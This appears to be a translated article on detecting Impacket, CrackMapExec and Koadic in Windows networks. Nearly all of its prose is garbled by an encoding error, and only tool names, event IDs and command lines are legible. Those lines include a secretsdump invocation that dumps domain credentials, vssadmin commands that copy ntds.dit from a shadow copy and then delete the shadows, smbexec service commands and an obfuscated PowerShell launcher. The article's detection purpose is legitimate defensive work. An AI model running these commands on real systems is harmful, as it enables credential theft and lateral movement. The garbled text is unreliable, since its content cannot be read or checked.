แแแ แแแ แแขแแฃแ แกแแฅแขแแ แจแ แแแแแแกแฎแแแแแก แ แแชแฎแแ แงแแแแแฌแแแฃแ แแ แแแ แแแแ: แแแแแแแแแ
แแฆแกแแแแจแแแแแ, แ แแ แแก แแแกแขแ แฃแแแแขแแแ แแแแแแงแแแแแ แแ แ แแแแแแแแ แแแแ แจแแฆแฌแแแแกแแแแก, แแ แแแแ แแแคแ แแกแขแ แฃแฅแขแฃแ แแก แจแแแแแ แจแแขแแแแก แแแแกแแแแแแ แแแแแ. แแแแแแแกแฎแแแแแแ แแงแแแแแแ แแแ แจแแขแแแแก แกแฎแแแแแกแฎแแ แแขแแแแ แแแ แแแแขแ แแก แจแแฆแฌแแแแก แจแแแแแ. แกแฎแแแแ แจแแ แแก, แแแแก แแฆแแแฉแแแ แซแแแแแ แแ แฎแจแแ แแ แแฎแแแแ แขแแฅแแแแแแแแแแก แแแฎแแแ แแแแ
แ แแกแ แแแแแแแแ แแแญแแ แแแแแแ:
- แแแแแแ แ แแแแ แแฃแจแแแแก แฐแแแแ แแแแก แแแกแขแ แฃแแแแขแแแ. แแแแ แแแแแ, แ แ แฃแแแ แแแแแแงแแแแ แแแแแแแกแฎแแแแแแแ แแ แ แ แขแแฅแแแแแแแแแแก แแแแแงแแแแแ แจแแฃแซแแแแ.
- แแแแแแ แแก, แ แแช แแ แแ แแก แแฆแแแฉแแแแแ แแแคแแ แแแชแแฃแแ แฃแกแแคแ แแฎแแแแแก แแแกแขแ แฃแแแแขแแแแ แแแแแแกแฎแแแก แแแ แแแ แแขแแแแ. แแแแแแ แแแก แคแแแ แจแแแซแแแแ แแแแแขแแแแ, แแ แแแแขแแ, แ แแ แแแแแแแกแฎแแแแ แแ แแก แจแแแ แแแแแแแกแฎแแแแ, แแ แแแแขแแ, แ แแ แแแแแแแกแฎแแแแ แแงแแแแแก แแแฎแแ แแขแก แแแคแ แแกแขแ แฃแฅแขแฃแ แแจแ, แ แแแแแแช แแแ แ แแ แแงแ แชแแแแแแ. แจแแกแแซแแแแแแ แฎแแแแ แแแกแ แฅแแแแแแแแแก แแแแแ แฏแแญแแแก แแฆแแแแแ, แแฅแแแแ แแแแแแแแแแ แ, แจแแแแแแแ แแแซแ แแแแแก แแแแแแแแแแก แกแฃแ แแแแ.
- แแฆแแแคแฎแแ แ แชแ แฃ แแแแแขแแแ แจแแญแ แแก แแฆแแแฉแแแแก แฎแแแกแแฌแงแแแแแแแ. แแ แฃแแแ แแแแแแแแฌแงแแแก, แ แแ แ แแแแกแแช แแแ แแแแฃแแ แฅแแแแแแแแ แแแแแแแแแแแแ แแฎแแแแ แแแแแแ แแแก แกแแคแฃแซแแแแแ, แจแแกแแซแแแแแแแ แฎแจแแ แ แจแแชแแแแแแ. แ แแแแ แช แฌแแกแ, แแแคแ แแกแขแ แฃแฅแขแฃแ แแจแ แแ แแก แกแแแแแ แแกแ แ แแแแแแแแแก แแแแแ, แแ แแ แจแแฎแแแแแ แแแแแขแแแฃแ แแกแแแ แแแแฃแ แฉแแแแแ, แแแแแกแแแแ แ แแแคแแ แแแชแแแก แแแกแแฆแแแแ.
แ แแก แแซแแแแก แแก แแแกแขแ แฃแแแแขแแแ แแแแแแแกแฎแแแแแแก? แแฃ แแก แแ แแก Impacket, แแแจแแ แแแแแแแกแฎแแแแแแ แแฆแแแแ แแแแฃแแแแแก แแแ แแแแแแแแแแแก, แ แแแแแแแช แจแแแซแแแแ แแแแแงแแแแแฃแ แแฅแแแก แจแแขแแแแก แกแฎแแแแแกแฎแแ แแขแแแแ, แ แแแแแแช แแแฐแงแแแแ แแแ แแแแขแ แแก แแแ แฆแแแแแก. แแแแ แ แแแกแขแ แฃแแแแขแ แแงแแแแแก Impacket-แแก แแแแฃแแแแก แจแแแแแแแแ - แแแแแแแแแ, Metasploit. แแแก แแฅแแก dcomexec แแ wmiexec แแแกแขแแแชแแฃแ แ แแ แซแแแแแแก แจแแกแแกแ แฃแแแแแแ, secretsdump แแแฎแกแแแ แแแแแแ แแแแแ แแจแแแแก แแแกแแฆแแแแ, แ แแแแแแแช แแแแแขแแแฃแแแ Impacket-แแแ. แจแแแแแแ, แแกแแแ แแแแแแแแแแแก แกแแฅแแแแแแแแก แกแฌแแ แ แแแแแแแแแ แฃแแ แฃแแแแแงแแคแก แฌแแ แแแแแฃแแแแแก แแแแแแแแแแก.
แจแแแแฎแแแแแแ แแ แแ แแก, แ แแ แจแแแฅแแแแแแแแ แแแฌแแ แแก "Powered by Impacket" CrackMapExec (แแ แฃแแ แแแแ CME) แจแแกแแฎแแ. แแแ แแ แแแแกแ, CME-แก แแฅแแก แแแ แคแฃแแฅแชแแแแแแแแ แแแแฃแแแ แฃแแ แกแชแแแแ แแแแกแแแแก: Mimikatz แแแ แแแแแแก แแ แแแแ แฐแแจแแก แแแกแแฆแแแแ, Meterpreter-แแก แแ Empire แแแแแขแแก แแแแแ แแแ แแแกแขแแแชแแฃแ แ แจแแกแ แฃแแแแแกแแแแก แแ Bloodhound แแแ แขแแ.
แแแกแแแ แแแกแขแ แฃแแแแขแ, แ แแแแแแช แฉแแแ แแแแ แฉแแแ, แแงแ Koadic. แแก แกแแแแแแ แชแแขแ แฎแแแก แฌแแ แแงแ แฌแแ แแแแแแแแแ, แแแ 25 แฌแแแก แแงแ แฌแแ แแแแแแแแแ แฐแแแแ แแแแก แกแแแ แแแจแแ แแกแ แแแแคแแ แแแชแแแแ DEFCON 2017 แแ แแแแแแ แฉแแแ แแ แแกแขแแแแแ แขแฃแแ แแแแแแแแ: แแฃแจแแแแก HTTP, Java Script แแ Microsoft Visual Basic Script (VBS) แกแแจแฃแแแแแแ. แแ แแแแแแแแก แฐแฅแแแ แแแฌแแก แแแ แแ แชแฎแแแ แแแ: แแแกแขแ แฃแแแแขแ แแงแแแแแก Windows-แจแ แฉแแจแแแแแฃแ แแแแแแแแแแฃแแแแแแกแ แแ แแแแแแแแแแแแก. แจแแแฅแแแแแแแ แแแก แฃแฌแแแแแแ COM Command & Control, แแ C3.
IMPACKET
Impacket-แแก แคแฃแแฅแชแแแแแแแแ แซแแแแแ แคแแ แแแ, แแแฌแงแแแฃแแ AD-แแก แจแแแแแ แแแแแแ แแแแแ แแ แแแแแชแแแแแแก แจแแแ แแแแแแ แจแแแ MS SQL แกแแ แแแ แแแแแแ, แกแแ แแแคแแแแขแแแแก แแแแแแแแแก แขแแฅแแแแแแแ: แแก แแ แแก SMB แกแแ แแแแ แจแแขแแแ แแ ntds.dit แคแแแแแก แแแฆแแแ, แ แแแแแแช แจแแแชแแแก แแแแฎแแแ แแแแแก แแแ แแแแแแก แฐแแจแแแก แแแแแแแก แแแแขแ แแแแ แแแแ. Impacket แแกแแแ แแกแ แฃแแแแก แแ แซแแแแแแแก แแแกแขแแแชแแฃแ แแ แแแฎแ แแแแกแฎแแแแแแฃแแ แแแแแแแก แแแแแงแแแแแแ: WMI, Windows Scheduler Management Service, DCOM แแ SMB แแ แแแแกแแแแแก แแแแแฎแแแก แ แฌแแฃแแแแแแ แกแแแแแแแก.
Secretsdump
แแแแแ แจแแแฎแแแแ secretsdump-แก. แแก แแ แแก แแแแฃแแ, แ แแแแแกแแช แจแแฃแซแแแ แแแแแ แแแก แ แแแแ แช แแแแฎแแแ แแแแแก แแแแฅแแแแแก, แแกแแแ แแแแแแแก แแแแขแ แแแแ แแแก. แแแกแ แแแแแงแแแแแ แจแแกแแซแแแแแแแ แแแฎแกแแแ แแแแก แแ แแแแแก LSA, SAM, SECURITY, NTDS.dit แแกแแแแแก แแแกแแฆแแแแ, แแกแ แ แแ, แแแกแ แแแฎแแ แจแแกแแซแแแแแแแ แจแแขแแแแก แกแฎแแแแแกแฎแแ แแขแแแแ. แแแแฃแแแก แแฃแจแแแแแก แแแ แแแแ แแแแแฏแ แแ แแก แแแแแแขแแคแแแแชแแ SMB-แแก แกแแจแฃแแแแแแ, แ แแแแแแช แแแแแฎแแแก แแแแฎแแแ แแแแแก แแแ แแแก แแ แแแก แฐแแจแก, แ แแแ แแแขแแแแขแฃแ แแ แแแแแฎแแ แชแแแแแก Pass the Hash แจแแขแแแ. แจแแแแแ แแแแแก แแแแฎแแแแ แกแแ แแแกแแก แแแแขแ แแแแก แแแแแฏแแ แแ (SCM) แฌแแแแแแก แแแกแแฎแกแแแแแ แแ แ แแแกแขแ แจแ แฌแแแแแแก แแแกแแฆแแแแ winreg แแ แแขแแแแแแก แกแแจแฃแแแแแแ, แ แแแแแก แแแแแงแแแแแแ แแแแแแแกแฎแแแแก แจแแฃแซแแแ แแแแ แแแแแก แแแขแแ แแกแแก แคแแแแแแแแแก แแแแแชแแแแแ แแ แแแแฆแแก แจแแแแแแแ SMB-แแก แกแแจแฃแแแแแแ.
แแแฎ. 1 แฉแแแ แแฎแแแแแ, แแฃ แ แแแแ แแฃแกแขแแ แฎแแแแ winreg แแ แแขแแแแแแก แแแแแงแแแแแแกแแก, แฌแแแแแ แแแแฆแแแ แ แแแกแขแ แแก แแแกแแฆแแแแก แแแแแงแแแแแแ LSA. แแแแกแแแแแก แแแแแแงแแแแ DCERPC แแ แซแแแแแ opcode 15 - OpenKey.
แแ แแแฏแ. 1. แ แแแกแขแ แแก แแแกแแฆแแแแก แแแฎแกแแ winreg แแ แแขแแแแแแก แแแแแงแแแแแแ
แจแแแแแ, แ แแแแกแแช แแแแแแจแแ แฌแแแแแ แแแแฆแแแ, แแแแจแแแแแแแแแ แแแแฎแแแ SaveKey แแ แซแแแแแแ opcode 20. Impacket แแแแก แแแแแแแก แซแแแแแ แกแแแชแแคแแแฃแ แ แแแแ. แแก แแแแฎแแแก แแแแจแแแแแแแแแก แคแแแแจแ, แ แแแแแก แกแแฎแแแแ 8 แจแแแแฎแแแแแแ แกแแแแแแแกแแแ แจแแแแแแ แ แกแขแ แแฅแแแ, แ แแแแแกแแช แแแ แแฃแแ แแฅแแก .tmp. แแแ แแ แแแแกแ, แแ แคแแแแแก แจแแแแแแแ แแขแแแ แแแ แฎแแแแ SMB-แแก แแแจแแแแแแ System32 แแแ แแฅแขแแ แแแแแ (แแแฎ. 2).
แแ แแแฏแ. 2. แแแกแขแแแชแแฃแ แ แแแแ แแขแแแแ แ แแแกแขแ แแก แแแกแแฆแแแแก แแแฆแแแแก แกแฅแแแ
แแแแแแแก, แ แแ แฅแกแแแจแ แแกแแแ แแฅแขแแแแแแก แแฆแแแฉแแแ แจแแกแแซแแแแแแแ แ แแแกแขแ แแก แแแ แแแแฃแ แคแแแแแแแแจแ แจแแแแแฎแแแ winreg แแ แแขแแแแแแก, แแแแแ แแขแฃแแ แกแแฎแแแแแแก, แแ แซแแแแแแแแก แแ แแแแ แแแแแแแแแแ แแแแก แแแแแงแแแแแแ.
แแก แแแแฃแแ แแกแแแ แขแแแแแก แแแแแก Windows-แแก แแแแแแแแก แแฃแ แแแแจแ, แ แแช แแแแแแแแแก แแแแชแแแแแก. แแแแแแแแแ, แแ แซแแแแแแก แจแแกแ แฃแแแแแก แจแแแแแแ
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
Windows Server 2016 แแฃแ แแแแจแ แฉแแแ แแแแแแแฎแแแ แแแแแแแแแแก แจแแแแแ แซแแ แแแแ แแแแแแแแแแ แแแแก:
1. 4624 - แแแกแขแแแชแแฃแ แ แจแแกแแแ.
2. 5145 - winreg แแแกแขแแแชแแฃแ แกแแ แแแกแแ แฌแแแแแแก แฃแคแแแแแแแก แจแแแแฌแแแแ.
3. 5145 - แคแแแแแ แฌแแแแแแก แฃแคแแแแแแแก แจแแแแฌแแแแ System32 แแแ แแฅแขแแ แแแจแ. แคแแแแก แแฅแแก แแแแแ แแแฎแกแแแแแ แจแแแแฎแแแแแแ แกแแฎแแแ.
4. 4688 - cmd.exe แแ แแชแแกแแก แจแแฅแแแ, แ แแแแแแช แแฌแงแแแก vssadmin:
โC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - แแ แแชแแกแแก แจแแฅแแแ แแ แซแแแแแแ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - แแ แแชแแกแแก แจแแฅแแแ แแ แซแแแแแแ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - แแ แแชแแกแแก แจแแฅแแแ แแ แซแแแแแแ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
แกแแแแฅแกแแแ
แแกแแแ แ แแแแ แช แแ แแแแแ แแแกแข-แแฅแกแแแฃแแขแแชแแแก แฎแแแกแแฌแงแ, Impacket-แก แแฅแแก แแแแฃแแแแ แแแกแขแแแชแแฃแ แแ แจแแกแแกแ แฃแแแแแแ แแ แซแแแแแแแแกแแแแก. แฉแแแ แงแฃแ แแแฆแแแแก แแแแแแแฎแแแแแแ smbexec-แแ, แ แแแแแแช แฃแแ แฃแแแแแงแแคแก แแแขแแ แแฅแขแแฃแแ แแ แซแแแแแแก แแแ แกแก แแแกแขแแแชแแฃแ แแแแฅแแแแแ. แแก แแแแฃแแ แแกแแแ แกแแญแแ แแแแก แแแแแแขแแคแแแแชแแแก SMB-แแก แกแแจแฃแแแแแแ, แแแ แแแแ แแ แแแ แแแแก แฐแแจแแ. แแแฎ. 3-แแ แฉแแแ แแฎแแแแแ แแแแแแแแก, แแฃ แ แแแแ แแฃแจแแแแก แแกแแแ แแแกแขแ แฃแแแแขแ, แแ แจแแแแฎแแแแแจแ แแก แแ แแก แแแแแแแแ แแแ แแแแแแแกแขแ แแขแแ แแก แแแแกแแแ.
แแ แแแฏแ. 3. แแแขแแ แแฅแขแแฃแแ smbexec แแแแกแแแ
smbexec-แแก แแแ แแแแ แแแแแฏแ แแแขแแ แแแแชแแแก แจแแแแแ แแ แแก SCM-แแก แแแฎแกแแ OpenSCManagerW แแ แซแแแแแแ (15). แแแแฎแแแแ แแฆแกแแแแจแแแแแ: MachineName แแแแ แแ แแก DUMMY.
แแ แแแฏแ. 4. แกแแ แแแกแแก แแแแขแ แแแแก แแแแแฏแแ แแก แแแฎแกแแแก แแแแฎแแแแ
แจแแแแแแ, แกแแ แแแกแ แแฅแแแแแ CreateServiceW แแ แซแแแแแแก แแแแแงแแแแแแ (12). smbexec-แแก แจแแแแฎแแแแแจแ, แงแแแแ แฏแแ แแ แจแแแแแซแแแ แแแแแแแฎแแ แแแแแ แแ แซแแแแแแก แแแแกแขแ แฃแฅแชแแแก แแแแแแ. แแแฎ. 5 แแฌแแแแ แแแฃแแแแแแก แฃแชแแแแแ แแ แซแแแแแแก แแแ แแแแขแ แแแแ, แงแแแแแแ แแแฃแแแแแแก แแแแแ, แแฃ แ แ แจแแฃแซแแแ แจแแชแแแแแก แแแแแแแกแฎแแแแแ. แแแแแแ แแแกแแฎแแแแ แแ, แ แแ แจแแกแ แฃแแแแแแ แคแแแแแก แกแแฎแแแ, แแแกแ แแแ แแฅแขแแ แแ แแ แแแแแแแแแแ แคแแแแ แจแแแซแแแแ แจแแแชแแแแแก, แแแแ แแ แแแแแ แฉแแแแก แจแแชแแแ แแแแ แแ แฃแคแ แ แ แแฃแแแ Impacket แแแแฃแแแก แแแแแแแก แแแ แฆแแแแแก แแแ แแจแ.
แแ แแแฏแ. 5. แแแแแฎแแแแ แกแแ แแแกแแก แจแแฅแแแ แกแแ แแแกแแก แแแแขแ แแแแก แแแแแฏแแ แแก แแแแแงแแแแแแ
Smbexec แแกแแแ แขแแแแแก แแจแแแ แ แแแแแก Windows-แแก แฆแแแแกแซแแแแแแแก แแฃแ แแแแจแ. Windows Server 2016 แแฃแ แแแแจแ แแแขแแ แแฅแขแแฃแแ แแ แซแแแแแแก แแแ แกแแกแแแแก ipconfig แแ แซแแแแแแ, แฉแแแ แแแแแแแฎแแแ แแแแแแแแแแก แจแแแแแ แซแแ แแแแ แแแแแแแแแแ แแแแก:
1. 4697 โ แกแแ แแแกแแก แแแงแแแแแ แแกแฎแแแ แแแแก แแแแฅแแแแแ:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - cmd.exe แแ แแชแแกแแก แจแแฅแแแ 1 แแฃแแฅแขแแก แแ แแฃแแแแขแแแแ.
3. 5145 - C$ แแแ แแฅแขแแ แแแจแ __output แคแแแแแ แฌแแแแแแก แฃแคแแแแแแแก แจแแแแฌแแแแ.
4. 4697 โ แกแแ แแแกแแก แแแงแแแแแ แแแแแ แแแแแฃแแแก แแแแฅแแแแแ.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - cmd.exe แแ แแชแแกแแก แจแแฅแแแ 4 แแฃแแฅแขแแก แแ แแฃแแแแขแแแแ.
6. 5145 - C$ แแแ แแฅแขแแ แแแจแ __output แคแแแแแ แฌแแแแแแก แฃแคแแแแแแแก แจแแแแฌแแแแ.
Impacket แแ แแก แกแแคแฃแซแแแแ แแแแแแกแฎแแแก แแแกแขแ แฃแแแแขแแแแก แแแแแแแแ แแแแกแแแแก. แแแ แแฎแแ แก แฃแญแแ แก Windows แแแคแ แแกแขแ แฃแฅแขแฃแ แแก แแแแฅแแแก แงแแแแ แแ แแขแแแแแก แแ แแแแแ แแ แแก แแฅแแก แแแแแกแ แแแแแฎแแกแแแแแแแแ แแแฎแแกแแแแแแแแแ. แแฅ แแ แแก แแแแแ แแขแฃแแ winreg แแแแฎแแแแแแ แแ SCM API-แก แแแแแงแแแแแ แแแแแฎแแกแแแแแแแแ แแ แซแแแแแแก แคแแ แแแ แแแแ, แคแแแแแก แกแแฎแแแแก แคแแ แแแขแแ แแ SMB share SYSTEM32.
CRACKMAPEXEC
CME แแแกแขแ แฃแแแแขแ แจแแฅแแแแแแ แซแแ แแแแแแ แแ แ แฃแขแแแฃแแ แแแฅแแแแแแแแแก แแแขแแแแขแแแแชแแแกแแแแก, แ แแแแแแแช แแแแแแแกแฎแแแแแ แฃแแแ แจแแแกแ แฃแแแก แฅแกแแแจแ แฌแแแกแแแแกแแแแก. แแก แกแแจแฃแแแแแแก แแแซแแแแ แแแฃแจแแแ แชแแแแแ Empire-แแก แแแแแขแแแ แแ Meterpreter-แแแ แแ แแแ. แแ แซแแแแแแแแก แคแแ แฃแแแ แจแแกแแกแ แฃแแแแแแ, CME-แก แจแแฃแซแแแ แแแแ แแแแแแแแ. Bloodhound-แแก (แชแแแแ แแแแแแ แแแก แฎแแแกแแฌแงแแก) แแแแแงแแแแแแ, แแแแแแแกแฎแแแแก แจแแฃแซแแแ แแแแแแแก แแฅแขแแฃแ แ แแแแแแแกแขแ แแขแแ แแก แกแแกแแแก แซแแแแแก แแแขแแแแขแแแแชแแ.
แกแแกแฎแแแก แแแแแกแฎแแ
Bloodhound, แ แแแแ แช แแแแแฃแแแแแแแแ แแแกแขแ แฃแแแแขแ, แกแแจแฃแแแแแแก แแซแแแแ แแแฌแแแแแ แแแแแแ แแ แฅแกแแแจแ. แแก แแแ แแแแแก แแแแแชแแแแแก แแแแฎแแแ แแแแแแแก, แแแแฅแแแแแแก, แฏแแฃแคแแแแก, แกแแกแแแแแก แจแแกแแฎแแ แแ แแแฌแแแแแฃแแแ PowerShell แกแแ แแแขแแก แแ แแ แแแแแ แคแแแแแก แกแแฎแแ. แแแคแแ แแแชแแแก แจแแกแแแ แแแแแแแ แแแแแแงแแแแแ LDAP แแ SMB-แแ แแแคแฃแซแแแแฃแแ แแ แแขแแแแแแแ. CME แแแขแแแ แแชแแแก แแแแฃแแ แกแแจแฃแแแแแแก แแซแแแแก Bloodhound-แก แฉแแแแขแแแ แแแก แแกแฎแแแ แแแแก แแแแฅแแแแจแ, แแแฃแจแแแก แแ แแแแฆแแก แจแแแ แแแแแฃแแ แแแแแชแแแแแ แจแแกแ แฃแแแแแก แจแแแแแ, แ แแแแช แแแขแแแแขแแแแ แแแก แกแแกแขแแแแจแ แแแฅแแแแแแแแก แแ แแแฎแแแก แแแ แแแแแแแแ แจแแกแแแฉแแแแก. Bloodhound แแ แแคแแแฃแแ แแแ แกแ แฌแแ แแแแแแแแแ แจแแแ แแแแแฃแ แแแแแชแแแแแก แแ แแคแแแแแแก แกแแฎแแ, แ แแช แกแแจแฃแแแแแแก แแแซแแแแ แแแแแแ แฃแแแแแแกแ แแแ แแแแแแแกแฎแแแแแก แแแแฅแแแแแแ แแแแแแแก แแแแแแแกแขแ แแขแแ แแแแ.
แแ แแแฏแ. 6. Bloodhound แแแขแแ แคแแแกแ
แแกแฎแแแ แแแแก แแแแฅแแแแแ แแแกแแจแแแแแ แแแแฃแแ แฅแแแแก แแแแแแแแแก ATSVC แแ SMB แแแแแงแแแแแแ. ATSVC แแ แแก แแแขแแ แคแแแกแ Windows Task Scheduler-แแแ แแฃแจแแแแแกแแแแก. CME แแงแแแแแก แแแแแก NetrJobAdd(1) แคแฃแแฅแชแแแก, แ แแแ แจแแฅแแแแก แแแแชแแแแแ แฅแกแแแจแ. แแแแแแแแ แแแแกแ, แแฃ แ แแก แแแแแแแแก CME แแแแฃแแ แแแฉแแแแแแแ แแแฎ. 7: แแก แแ แแก cmd.exe แแ แซแแแแแแก แแแแแซแแฎแแแ แแ แแฃแแแแแแแ แแแแ XML แคแแ แแแขแจแ แแ แแฃแแแแขแแแแก แกแแฎแแ.
แแแฎ.7. แแแแแแแแแก แจแแฅแแแ CME-แแก แกแแจแฃแแแแแแ
แแแแแแแแแก แจแแกแแกแ แฃแแแแแแ แฌแแ แแแแแแก แจแแแแแ, แแกแฎแแแ แแแแก แแแแฅแแแ แแฌแงแแแก แแแแแ Bloodhound-แก แแ แแก แฉแแแก แแแซแ แแแแแจแ. แแแแฃแแ แฎแแกแแแแแแแ LDAP แแแแฎแแแแแแแ แกแขแแแแแ แขแฃแแ แฏแแฃแคแแแแก, แแแแแแแก แงแแแแ แแแแ แแขแแกแ แแ แแแแฎแแแ แแแแแก แกแแแก แแแกแแฆแแแแ แแ แแแแฎแแแ แแแแแก แแฅแขแแฃแ แ แกแแกแแแแแก แจแแกแแฎแแ แแแคแแ แแแชแแแก แแแกแแฆแแแแ SRVSVC NetSessEnum แแแแฎแแแแแก แกแแจแฃแแแแแแ.
แแ แแแฏแ. 8. แแฅแขแแฃแ แ แกแแกแแแแแก แกแแแก แแแฆแแแ SMB-แแก แกแแจแฃแแแแแแ
แแแ แแ แแแแกแ, Bloodhound-แแก แแแจแแแแแก แแกแฎแแแ แแแแก แแแแ แแขแแ แฉแแ แแฃแแ แแฃแแแขแแ แแแ แแฎแแแแก แฆแแแแกแซแแแแ ID 4688 (แแ แแชแแกแแก แจแแฅแแแ) แแ แแ แแชแแกแแก แกแแฎแแแ. ยซC:WindowsSystem32cmd.exeยป
. แ แแช แแฆแกแแแแจแแแแแ แแแแจแ แแ แแก แแ แซแแแแแแก แฎแแแแก แแ แแฃแแแแขแแแ:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , โฆ , 40,41 )-jOIN'' ) "
Enum_avproducts
enum_avproducts แแแแฃแแ แซแแแแแ แกแแแแขแแ แแกแแ แคแฃแแฅแชแแแแแแฃแ แ แแ แแแแฎแแ แชแแแแแแแก แแแแแกแแแ แแกแแ. WMI แกแแจแฃแแแแแแก แแแซแแแแ แแแแแแงแแแแ WQL แจแแแแแฎแแแก แแแ Windows-แแก แกแฎแแแแแกแฎแแ แแแแแฅแขแแแแแแ แแแแแชแแแแแแก แแแกแแแแแแแแแ, แ แแกแแช แแ แกแแแแแแ แแงแแแแแก แแก CME แแแแฃแแ. แแก แฌแแ แแแฅแแแแก แจแแแแแฎแแแแก AntiSpywareProduct แแ AntiะirusProduct แแแแกแแแจแ แแแแแ แแแแแฃแแแก แแแแ แแขแแ แแแแแกแขแแแแ แแแฃแแ แแแชแแแก แฎแแแกแแฌแงแแแแแก แจแแกแแฎแแ. แกแแญแแ แ แแแแแชแแแแแแก แแแกแแฆแแแแ แแแแฃแแ แฃแแ แแแแแ rootSecurityCenter2 แกแแฎแแแแ แกแแแ แชแแก, แจแแแแแ แฅแแแแก WQL แแแแฎแแแแแก แแ แแฆแแแก แแแกแฃแฎแก. แแแฎ. แกแฃแ แแแ 9 แแแแฉแแแแแแก แแกแแแ แแแแฎแแแแแแแกแ แแ แแแกแฃแฎแแแแก แจแแแแแ แกแก. แฉแแแแก แแแแแแแแจแ แแแแแแแแ Windows Defender.
แแ แแแฏแ. 9. enum_avproducts แแแแฃแแแก แฅแกแแแฃแ แ แแฅแขแแแแแ
แฎแจแแ แแ, WMI แแฃแแแขแ (Trace WMI-Activity), แ แแแแแก แฆแแแแกแซแแแแแแจแแช แจแแแแซแแแแ แแแแแแ แกแแกแแ แแแแแ แแแคแแ แแแชแแ WQL แแแแฎแแแแแแแก แจแแกแแฎแแ, แจแแแซแแแแ แแแแแ แแฃแแ แแงแแก. แแแแ แแ แแฃ แแก แฉแแ แแฃแแแ, แแแจแแ แแฃ enum_avproducts แกแแ แแแขแ แแแจแแแแฃแแแ, แจแแแแแฎแแแ แแแแแแแ ID 11. แแก แจแแแชแแแก แแแแฎแแแ แแแแแก แกแแฎแแแก, แ แแแแแแแช แแแแแแแแ แแแแฎแแแแ แแ แกแแฎแแแ rootSecurityCenter2 แกแแฎแแแแ แกแแแ แชแแจแ.
แแแแแแฃแ CME แแแแฃแแก แแแแฉแแแ แกแแแฃแแแ แ แแ แขแแคแแฅแขแแแ, แแฅแแแแ แแก แแแแแ แแขแฃแแ WQL แแแแฎแแแแแแ แแฃ แแแ แแแแฃแแ แขแแแแก แแแแแแแแแก แจแแฅแแแ แแแแชแแแแแแก แแแแ แแแจแ แแแแแแแแแแ แแ Bloodhound-แแก แกแแแชแแคแแแฃแ แ แแฅแขแแแแแแ LDAP-แกแ แแ SMB-แจแ.
KOADIC
Koadic-แแก แแแแแ แฉแแฃแแ แแแแกแแแแ Windows-แจแ แฉแแจแแแแแฃแแ JavaScript แแ VBScript แแแขแแ แแ แแขแแขแแ แแแแก แแแแแงแแแแแ. แแ แแแแแกแแแ แแกแแ, แแก แแแฐแงแแแแ แแแฌแแก แแแแแแแแก แขแแแแแแชแแแก - แแแฃ แแแก แแ แแฅแแก แแแ แ แแแแแแแแแแฃแแแแแแ แแ แแงแแแแแก Windows-แแก แกแขแแแแแ แขแฃแ แแแกแขแ แฃแแแแขแแแก. แแก แแ แแก แกแ แฃแแ Command & Control (CnC) แแแกแขแ แฃแแแแขแ, แ แแแแแ แแแคแแฅแชแแแก แจแแแแแ แแแแฅแแแแแ แแแแแแขแแแแแฃแแแ "แแแแแแแขแ", แ แแแแแแช แกแแจแฃแแแแแแก แแซแแแแก แแแก แแแแขแ แแแก. แแกแแ แแแแฅแแแแก แแแแแฃแ แ แขแแ แแแแแแแแแแ โแแแแแโ แแฌแแแแแ. แแฃ แแกแฎแแแ แแแแก แแฎแ แแแแ แกแ แฃแแ แแแแ แแชแแแกแแแแก แแ แแกแแแแแ แแกแ แแ แแแแแแแแแแแ, Koadic-แก แแฅแแก แจแแกแแซแแแแแแแ แแแแแ แแแก แแกแแแ แแแแฎแแแ แแแแแก แแแแแ แแจแแก แแแแขแ แแแแก แจแแแแแแแแ (UAC แจแแแแแแแแ) แขแแฅแแแแแก แแแแแงแแแแแแ.
แแ แแแฏแ. 10. Koadic Shell
แแแแแ แแแแแฃแแแ แฃแแแ แแแแฌแงแแก แแแแฃแแแแแชแแ Command & Control แกแแ แแแ แแแ. แแแแกแแแแแก แแแก แฃแแแ แแแฃแแแแจแแ แแแก แแแ แ แแแแแแแแแฃแ URI-แก แแ แแแแฆแแก แแแแแแ แ Koadic แแ แแแแ แแ แ-แแ แแ แกแขแแแแ แแก แแแแแงแแแแแแ. แแแฎ. แกแฃแ แแแ 11 แแแแฉแแแแแแก แแแแแแแแก mshta stager-แแกแแแแก.
แแ แแแฏแ. 11. แกแแกแแแก แแแแชแแ แแแ CnC แกแแ แแแ แแแ
